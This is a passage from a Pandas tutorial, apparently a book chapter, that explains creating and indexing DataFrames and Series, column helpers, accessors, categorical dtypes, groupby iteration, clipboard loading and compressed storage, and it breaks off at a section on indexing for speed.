numpy_array = np.array([[1,2,3,4], [5,6,7,8],
                        [9,10,11,12], [13,14,15,16], [17,18,19,20]])
df = pd.DataFrame(numpy_array)

Dataframe index with row and column index

If we haven’t provided any Row Index values to the DataFrame, Pandas automatically generates a sequence (0 … 6) as row indices. To provide our own row index, we need to pass the index parameter in the DataFrame(…) function as the following:

df = pd.DataFrame(list_of_nums, index=[1,2,3,4,5])

The index need not be numerical all the time; we can even pass strings as the index. For example:

df = pd.DataFrame(
    list_of_nums,
    index=["First", "Second", "Third", "Fourth", "Fifth"]
)

As you might have guessed, index values are homogeneous in nature, which means we can also use NumPy arrays as the index.

numpy_array = np.array([10,20,30,40,50])
df = pd.DataFrame(list_of_nums, index=numpy_array)

Unlike Python lists or dictionaries, and just like NumPy, a column of the DataFrame will always be of the same type. We can check the data type of a column either by using dictionary-like syntax or by accessing the column name as an attribute of the DataFrame:

df['marks'].dtype    # Dict-like syntax
df.marks.dtype       # DataFrame.ColumnName
df.name.dtype        # DataFrame.ColumnName

If we want to check the data types of all the columns inside the DataFrame, we will use the dtypes attribute of the DataFrame as the following:

df.dtypes

It will display the type of all the columns.

Viewing data from the Pandas Dataframe

A Pandas DataFrame will contain a large number of rows of data at any point in time. To selectively view the dataframe rows, we can use the head(…) and tail(…) functions, which by default show the first or last five rows (if no input is provided); otherwise, they show the specified number of rows from the top or bottom. An extended example of the dataframe from the previous section is as follows:

In [15]: df.head()
Out[15]:
         0   1   2   3
First    1   2   3   4
Second   5   6   7   8
Third    9  10  11  12
Fourth  13  14  15  16
Fifth   17  18  19  20

In [16]: df.tail()
Out[16]:
          0   1   2   3
Third     9  10  11  12
Fourth   13  14  15  16
Fifth    17  18  19  20
Sixth    21  22  23  24
Seventh  25  26  27  28

In [17]: df.head(2)
Out[17]:
        0  1  2  3
First   1  2  3  4
Second  5  6  7  8

In [18]: df.tail(3)
Out[18]:
          0   1   2   3
Fifth    17  18  19  20
Sixth    21  22  23  24
Seventh  25  26  27  28

This was all about the data; however, what if we want to see the Row Indices and the Column names? Pandas DataFrame provides specific attributes for viewing them:

df.index     # For Row Indexes
df.columns   # For Columns

Helper functions for Dataframe columns

The Pandas DataFrame provides various column helper functions which are extremely useful for extracting valuable information from a column. Some examples of these functions are as follows:

unique: Provides unique elements from a column by removing duplicates. For example:

df.colors.unique()

mean: Provides the mean value of all the items in the column. For example:

df.weights.mean()

There are several other examples of column functions that can be looked up in the Pandas official documentation.

Using column as row index in DF

Mostly, the datasets already contain a row index. In those cases, we do not need the Pandas DataFrame to generate a separate row index. Not only is it redundant information, it also takes an unnecessary amount of memory. Pandas DataFrames allow setting any existing column or set of columns as the Row Index. The following is how we can use the columns as an index on our sample data:

>>> df = pd.DataFrame([['red', 11], ['white', 22], ['blue', 33], ['maroon', 44], ['black', 55]], columns=["colors", "values"])

>>> df
   colors  values
0     red      11
1   white      22
2    blue      33
3  maroon      44
4   black      55

>>> df.set_index('values')
        colors
values
11         red
22       white
33        blue
44      maroon
55       black

>>> df.set_index("colors")
        values
colors
red         11
white       22
blue        33
maroon      44
black       55

We can also set multiple columns as the index by passing a list to the set_index(…) method. Let's add a new column first and see how this works:

>>> df['shade'] = pd.Series(['light', 'dark', 'medium', 'dark', 'light'])
>>> df
   colors  values   shade
0     red      11   light
1   white      22    dark
2    blue      33  medium
3  maroon      44    dark
4   black      55   light

>>> df.set_index(["colors", "values"])
                 shade
colors values
red    11        light
white  22         dark
blue   33       medium
maroon 44         dark
black  55        light

Selective columns load in Pandas Dataframe

Any data analytics activity requires data cleanup, and it is quite possible that we decide to exclude some columns from the datasets that need to be analyzed. This not only saves memory, but also helps us focus on the data that is of interest, not to mention speeding up the load process. We will use the same data for loading the Pandas DataFrame, but this time we will specify the columns that will be part of the DataFrame:

>>> new_df = pd.DataFrame(df, columns=["colors", "shade"])

>>> new_df
   colors   shade
0     red   light
1   white    dark
2    blue  medium
3  maroon    dark
4   black   light

Dropping rows and columns from DataFrames

The Pandas DataFrame provides multiple ways of deleting the rows and columns. There is no functional penalty for choosing one over another. You may use whichever of the following syntax you are comfortable with:

Using dictionary syntax: To remove a column, we'll use del in the following way:

del df['colors']

Using drop function: Allows us to delete the columns as well as the rows. Whether we are going to delete the Rows or Columns is decided by the second argument in the drop function. The second argument 1 in function drop(…) denotes deletion of the Column, whereas 0 means deletion of the Row.

# Delete Column "values"
df.drop('values', 1)

# Delete the Row with Index "3"
df.drop(3, 0)

We can also delete multiple Rows and Columns by passing the list in the drop(…) function:

# Delete Columns "colors" & "values"
df.drop(['colors', 'values'], 1)

# Delete Rows with index "2", "3", & "4"
df.drop([2, 3, 4], 0)

Note that the row values passed to drop(…) are index labels, not positional numbers – the row(s) whose index matches that label are the ones removed.

Mathematical operations in DataFrames

Just like sheets in Excel, Pandas DataFrames make it easy to perform mathematical operations on complete DataFrames. It is also possible to do these operations on a single column, and this is where the Pandas Series comes into the picture.

We will look into the Pandas Series in the upcoming section; let us first see how mathematical operations can be performed on a complete DataFrame:

>>> import numpy as np
>>> import pandas as pd
>>> df = pd.DataFrame(np.random.randint(1,100,size=(5, 5)))

>>> df
    0   1   2   3   4
0   3   6  43  19  46
1  31  89  13  20   4
2  88  21  42   8  96
3  12   3  30  19  53
4  86  75  59   2  14

Multiplication: A DataFrame can be multiplied with a scalar value or, for that matter, with another DataFrame. Let us start with the random DataFrame created above:

>>> df * df
      0     1     2    3     4
0     9    36  1849  361  2116
1   961  7921   169  400    16
2  7744   441  1764   64  9216
3   144     9   900  361  2809
4  7396  5625  3481    4   196

>>> df * 10
     0    1    2    3    4
0   30   60  430  190  460
1  310  890  130  200   40
2  880  210  420   80  960
3  120   30  300  190  530
4  860  750  590   20  140

Addition/Subtraction: A DataFrame can be added to or subtracted from, with a scalar value or with another DataFrame, in line with the multiplication operation discussed earlier:

>>> df + 100
     0    1    2    3    4
0  103  106  143  119  146
1  131  189  113  120  104
2  188  121  142  108  196
3  112  103  130  119  153
4  186  175  159  102  114

Bitwise operations: Bitwise operations like AND (&), OR (|), and others can be applied to the complete DataFrame.

>>> df & 0
   0  1  2  3  4
0  0  0  0  0  0
1  0  0  0  0  0
2  0  0  0  0  0
3  0  0  0  0  0
4  0  0  0  0  0

Creating Pandas series

Technically, the Pandas Series is a single-dimensional labeled array that is capable of storing any data type. Simply put, a Pandas Series is equivalent to a column in an excel sheet. When it comes to the Pandas Data Structure, a Series represents a single column stored in memory, which is either independent or is part of a Pandas Dataframe.

You can create a Pandas Series out of a Python list or NumPy array. However, we need to keep in mind that unlike a normal Python list, which can support data of mixed datatypes, a series will always contain the data of the same data type. Now this is what makes Numpy arrays the preferred choice for creating Pandas Series.

list_series = pd.Series([1,2,3,4,5,6])
np_series = pd.Series(np.array([10,20,30,40,50,60]))

Similar to Dataframes, while generating the Series, Pandas also generates row index numbers starting from 0. Now, for cleaner operations, we can supply our own index values during the creation of a Series. We simply need to pass the index parameter, which accepts a list containing values of the same data type, or even a Numpy array. Let us see an example of a Series generated from Numpy:

idx_series = pd.Series(
    np.array([101,202,303,404,505,606]),
    index=np.arange(0,12,2)
)

The following example shows the use of strings as row index:

idx_series = pd.Series(
    np.array([101,202,303,404,505,606]),
    index=['a', 'b', 'c', 'd', 'e', 'f']
)

You can view the Series row index with the following:

idx_series.index

It is important to note that the preceding always returns a pandas Index object (backed by a NumPy array), irrespective of whether a list or a NumPy array was passed while creating the series.

Slicing a series from a DataFrame in Pandas

An isolated Series data structure is quite useful when it comes to analysing data, and it comes packed with a plethora of helper functions. In most cases, however, you will end up using multiple such Series together, which could in turn be replaced with a DataFrame, or a combination of the two.

data_dict = {
    'name': ["mark", "robert", "cane", "abel", "lucifer"],
    'age': [10, 25, 93, 400, 5000],
    'designation': ["Stuntman", "Director", "President", "PM", "SatanHimself"]
}

df = pd.DataFrame(data_dict, index=[
    "Tiny -> ", "Small -> ", "Normal -> ", "Huge -> ", "Woah -> "])

The following is how the resultant DataFrame will look:

In [58]: df
Out[58]:
               name   age   designation
Tiny ->        mark    10      Stuntman
Small ->     robert    25      Director
Normal ->      cane    93     President
Huge ->        abel   400            PM
Woah ->     lucifer  5000  SatanHimself

A DataFrame column in Pandas can be accessed using one of the two supported syntaxes: one similar to a dictionary – df['column_name'] – or attribute style – df.column_name. Accessing a column in either way returns a Series object.

Series from DataFrame iterations

A Pandas DataFrame is iterable and allows us to iterate through the individual columns to extract the series.

series_col = []
for col_name in df.columns:
    series_col.append(df[col_name])

Using series to create DataFrames

A Dataframe in Pandas is internally a combination of one or more Pandas Series. This allows us to combine the multiple Series to generate a DataFrame. For example, let us generate a DataFrame from combining a series of names and series of ages used earlier:

In [73]: idx_series = pd.Series(
             [10, 25, 93, 400, 5000],
             index=["mark", "robert", "cane", "abel", "lucifer"]
         )

In [74]: df_from_series = pd.DataFrame([idx_series])

In [75]: df_from_series
Out[75]:
   mark  robert  cane  abel  lucifer
0    10      25    93   400     5000

What you will notice is that the row indexes of Series have now become the column while the columns have been used as the row index value. This phenomenon is similar to taking a Transpose of the matrix. This will hold true even when we provide multiple Series in a comma separated fashion to create a DataFrame.

df_from_series_multiple = pd.DataFrame([series_name1, series_name2])

Ok, now this magic will not happen if you remove the list or array notation while using the Series.

In [76]: df_from_series = pd.DataFrame(idx_series)

In [77]: df_from_series
Out[77]:
            0
mark       10
robert     25
cane       93
abel      400
lucifer  5000

That does the trick. But this does not apply to the case when multiple Series are to be used in the creation process, since Pandas only supports a single argument in this case.

Using Dicts to create DataFrames

Now, the same phenomenon applies to the use of Python dictionaries in the creation of a Dataframe. Let us look at a sample_dict that we will use to create the dataframe:

>>> sample_dict = {'a': 1, 'b': 2, 'c': 3}
>>> df = pd.DataFrame([sample_dict])
>>> df
   a  b  c
0  1  2  3

Notice that here, the keys are represented as columns, which otherwise would have been used as the row index if we had created a Series instead.

Creating DF from multiple dicts

Pandas also allows combining multiple such dicts for creating a single DataFrame:

>>> df = pd.DataFrame([sample_dict, sample_dict], index=["Row1", "Row2"])
>>> df
      a  b  c
Row1  1  2  3
Row2  1  2  3

Helper functions for Pandas Series

Pandas Series comes bundled with an extensive set of helper functions that aid the modern data analyst. It is worth noting that all the Column helper functions that come with the Pandas DataFrame will also work out of the box with the Pandas Series. Some of the examples include the following:

# Getting the mean of a Series
series_name.mean()

# Getting the size of the Series
series_name.size

# Getting all unique items in a series
series_name.unique()

# Getting a python list out of a Series
series_name.tolist()

You can view the complete list of functions that are supported by the Series data structure in the official Pandas documentation.

Series iterations

Similar to most other Python data structures, the Series object also supports iterations using a loop:

for value in series_name:
    print(value)

We can also iterate over the series row indexes by using the following:

for row_index in series_name.keys():
    print(row_index)

Pandas tips, tricks and idioms

Pandas provides very streamlined forms of data representation. Simpler data representation facilitates better results for data centric projects. In this section, we will be discussing some useful pointers on how to make the best of the Pandas library.

Configurations, options, and settings at startup

There are several options and system settings that you can configure for Pandas. Setting customized Pandas options when the interpreter starts gives us a huge advantage in terms of productivity, especially if you primarily work in a scripting environment. You can leverage the pd.set_option() function to configure all the desired options from a Python or IPython startup file. You will have to use the dot notation here, for example pd.set_option('display.max_colwidth', 25), and the settings can in turn be driven from a dictionary of options:

import pandas as pd

def start():
    options = {
        'display': {
            'max_columns': None,
            'max_colwidth': 25,
            # Don't wrap to multiple pages
            'expand_frame_repr': False,
            'max_rows': 14,
            'max_seq_items': 50,
            # Floating point precision
            'precision': 4,
            'show_dimensions': False
        },
        'mode': {
            # Controls SettingWithCopyWarning
            'chained_assignment': None
        }
    }

    for category, option in options.items():
        for op, value in option.items():
            pd.set_option(f'{category}.{op}', value)

if __name__ == '__main__':
    start()
    del start  # Clean up interpreter namespace

Now, if you launch your Python interpreter session, the startup script will have been executed and Pandas will be automatically imported with all the desired settings and configurations.

>>> pd.__name__
'pandas'
>>> pd.get_option('display.max_rows')
14

This is specifically useful if your team or organisation primarily uses Pandas as a key data analysis tool. In that case, setting the custom options would ensure that each person working with Pandas implicitly follows the same conventions. To see how the formatting in the preceding sample startup file plays out, we will use some data on abalone hosted by the UCI Machine Learning Repository. You will notice that the data is truncated at exactly 14 rows, with four digits of precision for floating point numbers:

>>> url = ('https://archive.ics.uci.edu/ml/'
...        'machine-learning-databases/abalone/abalone.data')

>>> cols = ['sex', 'height', 'weight', 'length', 'diam', 'rings']

>>> abalone = pd.read_csv(url, usecols=[0, 1, 2, 3, 4, 8], names=cols)

>>> abalone
     sex  height  weight  length    diam  rings
0      M   0.455   0.365   0.095  0.5140     15
1      M   0.350   0.265   0.090  0.2255      7
2      F   0.530   0.420   0.135  0.6770      9
3      M   0.440   0.365   0.125  0.5160     10
4      I   0.330   0.255   0.080  0.2050      7
...   ..     ...     ...     ...     ...    ...
4172   F   0.565   0.450   0.165  0.8870     11
4173   M   0.590   0.440   0.135  0.9660     10
4174   M   0.600   0.475   0.205  1.1760      9
4175   F   0.625   0.485   0.150  1.0945     10
4176   M   0.710   0.555   0.195  1.9485     12

[4177 rows x 6 columns]

Using Pandas’ testing module for sample data structures

Included in the Pandas’ native testing module are a number of useful and convenient functions that will help to quickly build quasi-realistic Series and DataFrames:

>>> import pandas.util.testing as tm
>>> tm.N, tm.K = 15, 3
>>> import numpy as np
>>> np.random.seed(444)

>>> tm.makeTimeDataFrame(freq='M').head()
                   A         B         C         D
2000-01-31  0.357440  0.266873  0.353728 -0.536561
2000-02-29  0.377538 -0.480331 -0.433926 -0.886787
2000-03-31  1.382338  0.300781 -0.498028  0.107101
2000-04-30  1.175549 -0.179054  0.228771 -0.740890
2000-05-31 -0.939276  1.183669 -0.650078 -0.075697

>>> tm.makeDataFrame().head()
                   A         B         C         D
b8jgVbQbug -0.748504 -0.099509 -0.060078  0.035310
OKCyyhkEvY  0.498427  0.798287 -0.169375 -1.487501
RtcTWq0AMT -0.148212  0.507709 -0.089451 -0.716834
vtdamOujY0 -0.348742  0.273927  1.551892 -0.054453
tW49Zqe3lC  0.161808  0.839752  0.690683  1.536011

Now, that makes the process of testing much simpler when you do not have to worry about where the data comes from. The module ships with around 30 such functions, which you can view by calling dir() on the module object itself.

>>> [i for i in dir(tm) if i.startswith('is')]
['is_bool',
 'is_categorical_dtype',
 'is_datetime64_dtype',
 'is_datetime64tz_dtype',
 'is_extension_array_dtype',
 'is_interval_dtype',
 'is_number',
 'is_numeric_dtype',
 'is_period_dtype',
 'is_sequence',
 'is_timedelta64_dtype']

These operations can be ultra helpful if you need to benchmark, or test assertions, or experiment with Pandas operations that you are less familiar with, without having to scour for sample datasets.

Using Accessor methods

Accessors are similar to getter functions in most object-oriented languages. For the purpose of this section, let us assume that accessors in Pandas are properties that serve as an interface to other additional functions.

The Pandas Series comes with the following accessors:

>>> pd.Series._accessors
{'cat', 'dt', 'sparse', 'str'}

Now, let us take a brief look at these accessors, what they can do, and how you can leverage them in your daily work.

.cat indicates categorical data, .str indicates string (object) data, and .dt indicates datetime-like data.

Let us start with .str. Assume that we have some location information stored as a simple Pandas Series of strings. The Pandas string methods are vectorized, which means that they operate on the complete array without the need for an explicit for-loop:

>>> address = pd.Series([
...     'Seattle, D.C. 12345',
...     'Brooklyn, NY 12346-1755',
...     'Palo Alto, CA 58131',
...     'Redmond, CA 98123'])

>>> address.str.upper()
0        SEATTLE, D.C. 12345
1    BROOKLYN, NY 12346-1755
2        PALO ALTO, CA 58131
3          REDMOND, CA 98123
dtype: object

>>> address.str.count(r'\d')  # 5 or 9-digit zip?
0    5
1    9
2    5
3    5
dtype: int64

Ok, now diving deeper, let us assume that we want to separate out the city/state/ZIP information into three fields of a DataFrame. We can pass a regex to the .str.extract() method, where .str is the accessor and the whole thing is an accessor method.

>>> regex = (
...     r'(?P<city>[A-Za-z ]+), '        # One or more letters
...     r'(?P<state>[A-Z]{2}) '          # 2 capital letters
...     r'(?P<zip>\d{5}(?:-\d{4})?)')    # Optional 4-digit suffix

>>> address.str.replace('.', '').str.extract(regex)
        city state         zip
0    Seattle    DC       12345
1   Brooklyn    NY  12346-1755
2  Palo Alto    CA       58131
3    Redmond    CA       98123

This example also highlights the concept of method-chaining, where .str.extract(regex) is called on the return value of address.str.replace('.', ''), which cleans up the periods in order to get a clean 2-character state abbreviation.

Now, why should you use these accessor methods in the first place, when you could simply apply an ordinary Python function to each element, for example via .apply()? Looking into how these accessor methods actually work helps answer this query.

Each available accessor in itself is a bona fide class in Python:

.str maps to StringMethods.

.dt maps to CombinedDatetimelikeProperties.

.cat routes to CategoricalAccessor.

These standalone classes are then attached to the Series class using a CachedAccessor. It is when the classes are wrapped in CachedAccessor that we see a bit of magic happen. CachedAccessor is inspired by a cached-property design – a property is only computed once per instance and then replaced by an ordinary attribute. To achieve this, it overloads the .__get__() method, which is part of Python's descriptor protocol.

Python 3 has also introduced functools.lru_cache(), which offers a similar functionality. There are examples all over the place for this pattern, such as in the aiohttp package.
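For intuition only, the following is a minimal sketch of that cached-property pattern, not Pandas' actual CachedAccessor implementation; the Dataset class and its total property are hypothetical:

class cached_property:
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, instance, owner=None):
        if instance is None:
            return self
        # Compute once, then store the result on the instance so that
        # subsequent attribute lookups bypass this descriptor entirely.
        value = self.func(instance)
        instance.__dict__[self.name] = value
        return value

class Dataset:
    def __init__(self, values):
        self.values = values

    @cached_property
    def total(self):
        print("computing...")
        return sum(self.values)

d = Dataset([1, 2, 3])
print(d.total)   # prints "computing..." and then 6
print(d.total)   # 6, the cached value is reused

Python 3.8 and later ship functools.cached_property, which is built on the same idea.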

The next accessor, .dt, is for datetime-like data. It technically belongs to Pandas' DatetimeIndex, and if called on a Series, the Series is converted to a DatetimeIndex first:

>>> datering = pd.Series(pd.date_range('2015', periods=9, freq='Q'))
>>> datering
0   2015-03-31
1   2015-06-30
2   2015-09-30
3   2015-12-31
4   2016-03-31
5   2016-06-30
6   2016-09-30
7   2016-12-31
8   2017-03-31
dtype: datetime64[ns]

>>> datering.dt.day_name()
0      Tuesday
1      Tuesday
2    Wednesday
3     Thursday
4     Thursday
5     Thursday
6       Friday
7     Saturday
8       Friday
dtype: object

>>> datering[datering.dt.quarter > 2]
2   2015-09-30
3   2015-12-31
6   2016-09-30
7   2016-12-31
dtype: datetime64[ns]

>>> datering[datering.dt.is_year_end]
3   2015-12-31
7   2016-12-31
dtype: datetime64[ns]

The third accessor, .cat, is for use with Categorical data only.

DatetimeIndex from component columns

When it comes to datetime-like data, similar to the datering mentioned earlier, we can also create a Pandas DatetimeIndex from multiple component columns which can together form a date or datetime:

>>> from itertools import product
>>> datecols = ['year', 'month', 'day']
>>> df = pd.DataFrame(list(product(
...     [2019, 2020], [1, 2], [1, 2, 3])), columns=datecols)
>>> df['data'] = np.random.randn(len(df))
>>> df
    year  month  day      data
0   2019      1    1 -0.261110
1   2019      1    2  0.028835
2   2019      1    3  0.122392
3   2019      2    1 -0.438345
4   2019      2    2  0.612122
5   2019      2    3 -2.506080
6   2020      1    1 -1.040233
7   2020      1    2 -0.967498
8   2020      1    3  0.595033
9   2020      2    1  0.873375
10  2020      2    2 -0.892723
11  2020      2    3  2.196084

>>> df.index = pd.to_datetime(df[datecols])
>>> df.head()
            year  month  day      data
2019-01-01  2019      1    1 -0.261110
2019-01-02  2019      1    2  0.028835
2019-01-03  2019      1    3  0.122392
2019-02-01  2019      2    1 -0.438345
2019-02-02  2019      2    2  0.612122

Finally, we can now drop the old individual columns and convert this into a Series:

>>> df = df.drop(datecols, axis=1).squeeze()
>>> df.head()
2019-01-01   -0.261110
2019-01-02    0.028835
2019-01-03    0.122392
2019-02-01   -0.438345
2019-02-02    0.612122
Name: data, dtype: float64

>>> df.index.dtype.name
'datetime64[ns]'

So, why do we pass a DataFrame here? Imagine that a DataFrame resembles a dictionary in which the column names are the keys, and the individual columns, represented by Series, are the dictionary values. This is the reason why pd.to_datetime(df[datecols].to_dict(orient='list')) would also be a valid operation here. This mirrors the construction of Python's datetime.datetime, where we can pass keyword arguments, for example, datetime.datetime(year=2000, month=1, day=15).

Using categorical data for time and space optimization

A powerful feature bundled with Pandas is its Categorical dtype. Even if we are not always working with huge datasets that use gigabytes of RAM, we have probably run into cases where straightforward operations on large DataFrames seem to lag for seconds.

It can be argued that Pandas object dtype is often a great candidate for conversion to category data. (Object is a container for Python heterogeneous data types, or other types that are not directly decipherable.) Strings in Python occupy a significant amount of memory space:

>>> import pandas as pd
>>> colors = pd.Series([
...     'periwinkle', 'mint green', 'burnt orange',
...     'periwinkle', 'burnt orange'])

>>> import sys
>>> colors.apply(sys.getsizeof)
0    59
1    59
2    61
3    59
4    61
dtype: int64

We have used sys.getsizeof() to demonstrate the memory consumed by the individual values in the Series. Also note that these are Python objects that have some overhead to begin with (sys.getsizeof('') will return 49 bytes).

We also have the .memory_usage() method, which summarizes the memory consumption and relies on the .nbytes attribute of the underlying NumPy array. Now, what if we could take the unique colors in the example and map each of them to a less space-consuming integer? Let's take a naïve example:

>>> mapper = {v: k for k, v in enumerate(colors.unique())}
>>> mapper
{'periwinkle': 0, 'mint green': 1, 'burnt orange': 2}

>>> as_int = colors.map(mapper)
>>> as_int
0    0
1    1
2    2
3    0
4    2
dtype: int64

>>> as_int.apply(sys.getsizeof)
0    24
1    28
2    28
3    24
4    28
dtype: int64

As we can see, this reduces the memory consumption to half, as compared to when the raw strings were used to store the object dtype. In the previous section on accessors, we learnt about the categorical accessor. This preceding code fragment gives a brief idea of how the categorical dtype internally works in Pandas.

It is worth noting that the memory consumption of a Categorical dtype is proportional to the number of categories added to the length of the data. On the contrary, an object dtype is a constant multiplied by the length of the data.
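To see this trade-off concretely, the Series .memory_usage(deep=True) method can be compared before and after conversion. The repeated-colours Series below is a made-up example, and the exact byte counts will vary by platform and Pandas version:

many_colors = pd.Series(['periwinkle', 'mint green', 'burnt orange'] * 100_000)

# object dtype: one Python string object per row
print(many_colors.memory_usage(deep=True))

# category dtype: one small integer code per row plus a tiny table of categories
print(many_colors.astype('category').memory_usage(deep=True))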

An added advantage is that the computational efficiency also gets a boost here – for a categorical Series, the string operations are performed on the .categories attribute instead of on each original element of the Series. To put it otherwise, the operation is done once for each unique category, and the results are mapped back to the original values. The categorical data has a .cat accessor that is a window into attributes and methods for manipulating the categories:

>>> cat_colors = colors.astype('category')
>>> cat_colors.cat.categories
Index(['burnt orange', 'mint green', 'periwinkle'], dtype='object')
>>> cat_colors.cat.codes
0    2
1    1
2    0
3    2
4    0
dtype: int8

If we look at the dtype, it is NumPy's int8, an 8-bit signed integer that can take on values from -128 to 127. (Only a single byte is needed to represent a value in memory; 64-bit signed ints would be overkill in terms of memory usage.) Our rough-hewn example resulted in int64 data by default, whereas Pandas is smart enough to downcast the categorical data to the smallest numerical dtype possible.

However, there are a few catches here. We cannot always use the categorical data. The categorical data is generally less flexible. For example, if we are inserting the previously unseen values, we need to add this value to a .categories container first. If we plan to set values or reshape the data rather than deriving new computations, Categorical types may be rather less nimble and not a great choice.
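A short, hedged sketch of that first catch, reusing the cat_colors Series from above (the new 'salmon' value is hypothetical):

# Assigning a previously unseen value to a categorical Series raises an error,
# so the new category has to be registered before it can be used.
cat_colors = cat_colors.cat.add_categories(['salmon'])
cat_colors[0] = 'salmon'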

Groupby objects through iteration

Groupby is a fundamental operation. When df.groupby('x') is called, the resulting groupby objects in Pandas can be a bit opaque. This object then undergoes a lazy instantiation and does not have any meaningful representation by itself. All right, now we have a groupby object, but what is this thing, and how do we see it?

Before we call constructs like .agg() or .apply() on it, we can take advantage of the fact that groupby objects are iterable in nature. Each "entity" yielded by the iterator is basically a tuple of (name, subsetted object), where the name is the value of the column on which we're grouping, and the subsetted object is nothing but a DataFrame that is a subset of the original DataFrame, based on the grouping condition we provide. That is, the data is chunked per group.

So, regardless of what calculation we perform on the grouped object, be it a single Pandas function or a custom-built function, each of these "sub-frames" is passed, one at a time, as an argument to that callable. This is where the term split-apply-combine originates – break up the data as per the groups, perform a group-wise calculation, and then recombine them in an aggregated manner.
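A small, hypothetical example of iterating over a groupby object directly, which makes the (name, sub-frame) structure visible:

df = pd.DataFrame({
    'city': ['Austin', 'Austin', 'Dallas', 'Dallas'],
    'sales': [10, 20, 5, 7],
})

# Each iteration yields the group key and the matching subset of rows.
for city, sub_frame in df.groupby('city'):
    print(city, '->', sub_frame['sales'].sum())
# Austin -> 30
# Dallas -> 12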

Membership binning mapping trick

Let us assume that we have a Series and a corresponding mapping table in which each value is part of some multi-member group, or not part of any group at all.

>>> countries = pd.Series([
...     'United States', 'Canada', 'Mexico',
...     'Belgium', 'United Kingdom', 'Thailand'])

>>> groups = {
...     'North America': ('United States', 'Canada', 'Mexico', 'Greenland'),
...     'Europe': ('France', 'Germany', 'United Kingdom', 'Belgium')
... }

The countries Series that we want to map looks like the following:

>>> countries
0     United States
1            Canada
2            Mexico
3           Belgium
4    United Kingdom
5          Thailand
dtype: object

Let us analyse the use case here. We want an operation similar to pd.cut() in Pandas, but in this case we need to bin based on categorical group membership. We could use pd.Series.map(), which we have come across earlier. In order to achieve that, we will use the following code fragment:

from typing import Any

def membership_map(s: pd.Series, groups: dict, fillvalue: Any = -1) -> pd.Series:
    # Reverse & expand the dictionary key-value pairs
    groups = {x: k for k, v in groups.items() for x in v}
    return s.map(groups).fillna(fillvalue)

Now, we expect this to run significantly faster than a nested Python loop over the groups for each country in countries. Let us take a test drive:

>>> membership_map(countries, groups, fillvalue='other')
0    North America
1    North America
2    North America
3           Europe
4           Europe
5            other
dtype: object

We now break down what’s actually going on here.

This would be a great place to step into a function’s scope with Python’s debugger, pdb, to inspect which variables are local to the function.

The objective here is to map every group to an integer. However, Series.map() will not recognize a string like 'ab' as a single key – it needs to be broken down, with each character from each group mapped to an integer. The following is what the dictionary comprehension here is doing:

>>> groups = dict(enumerate(('ab', 'cd', 'xyz')))

>>> {x: k for k, v in groups.items() for x in v}
{'a': 0, 'b': 0, 'c': 1, 'd': 1, 'x': 2, 'y': 2, 'z': 2}

Now, this dictionary can be passed to s.map() to map its values to their corresponding group indices.

Boolean operator usage in Pandas

It may not be specific to the Pandas library, but the reason that '3 and 5' evaluates to 5 is the phenomenon called short-circuit evaluation: for a short-circuit operator, the return value is the last argument that was evaluated. Pandas, and Numpy on which Pandas is built, do not use the standard and, or, and not. Rather, we have &, |, and ~, which are the regular Python bitwise operators. In the case of Pandas, these operators have a higher precedence than the comparison operators used alongside them. What Pandas does is override the internal dunder methods, the likes of .__ror__(), which map to the given operators.

The crux here is that the developers of Pandas intentionally did not define the truth value of a complete Series. If you have ever wondered whether a whole Series is True or False – you can't tell! It is not defined, or rather, it is ambiguous.

>>> bool(s)
ValueError: The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all()

In the case of a Series, you are better off performing the comparisons element-wise. This is the reason parentheses are needed whenever comparison operators are combined with & or |.
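A short illustration of why the parentheses matter (the Series s here is a made-up example):

s = pd.Series([1, 3, 5, 7, 9])

# Parentheses are required because & binds tighter than the comparisons.
mask = (s > 2) & (s < 8)
print(s[mask])            # 3, 5, 7

# Without them, `s > 2 & s < 8` is parsed as `s > (2 & s) < 8`, a chained
# comparison that raises the ambiguous truth-value error shown above.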

Directly load clipboard data with Pandas

Most organisations have stockpiles of data stored in the form of text files or Excel sheets. If you have been brave enough to start using Python, you may need some easy ways to copy or transfer the data from these viewable storage formats into a Pandas dataframe. There are APIs readily available, but what if you are in the middle of a terminal or interpreter session and need a quick way to avoid saving the data to a file and then reading it back? What we can do here is leverage the clipboard of the machine we are working on as a buffer for reading this data with Pandas, using the pd.read_clipboard() API with the appropriate keyword arguments.

What this will do is enable you to copy any structured data into a DataFrame or Series directly. For illustrating this, let us say we have the following data snippet in Excel:

Figure 6.1: Excel Data Snippet

All you have to do is perform the age-old select and copy on the preceding data and then, from the interpreter, simply call the pd.read_clipboard() method:

>>> df = pd.read_clipboard(na_values=[None], parse_dates=['d'])
>>> df
   a         b    c          d
0  0    1.0000  inf 2000-01-01
1  2    7.3891  NaN 2013-01-05
2  4   54.5982  NaN 2018-07-24
3  6  403.4288  NaN        NaT

>>> df.dtypes
a             int64
b           float64
c           float64
d    datetime64[ns]

dtype: object

Store Pandas objects in a compressed format

This lesser known trick is a cool one to conclude this list. If you are using any Pandas version greater than 0.21.0, you have the ability to store Pandas objects directly in zip, bz2, gzip, or xz compressed form, instead of performing an external compression step. The command to do this would be the following:

my_data.to_json('my_df.json.gz', orient='records', lines=True, compression='gzip')

It also gives a decent compression ratio, which for the sample case used earlier came to about 11.6x:

>>> import os.path
>>> os.path.getsize('my_df.json') / os.path.getsize('my_df.json.gz')
11.617055

Speeding up your Pandas projects

When I first adopted Pandas, I was told that although it was a superb tool for processing and handling datasets, when it came to statistical modelling it would not be the fastest player in the team. This evidently turned out to be true over time. Pandas operations on large data chunks did require a few seconds to minutes of waiting.

However, what should be focussed on is that Pandas is built on the foundation of native Numpy arrays, which have most of their underlying operations and computations implemented in C. Several of Pandas' internal modules and extensions are written in Cython, and hence compiled to native C. All this should imply that Pandas should be fast. So, why don't we get to see the speed?

The truth is that Pandas would indeed be fast, if we used it in the right way, the way it was supposed to be. When we take a closer look at the paradox in place here, we realize that some code that may seem Pythonic in every way, may not be the most optimal one for efficiency when it comes to Pandas. Similar to how Numpy operates, Pandas is primarily designed to tackle vectorized operations which are meant to process complete columns in datasets in a single step. Operating on an individual cell level should be the last thing that one needs to try out.

Pandas is inherently a speed-optimized tool, if properly used. It is worth noting that cleanly written code may not be the same as optimized code when it comes to Pandas. In this section, we will be discussing the Pythonic use of Pandas’ simple yet powerful features. We will also discuss some time saving optimizations for Python projects so that you can focus on the math, rather than the operations.

Optimize Dataframe operations with indexing

Just like any other datastore, indexing speeds up the operations in a Pandas Dataframe, which results from the faster lookups and merging. Here is an example of a merge operation with and without an index on a random Dataframe. The following are the results:

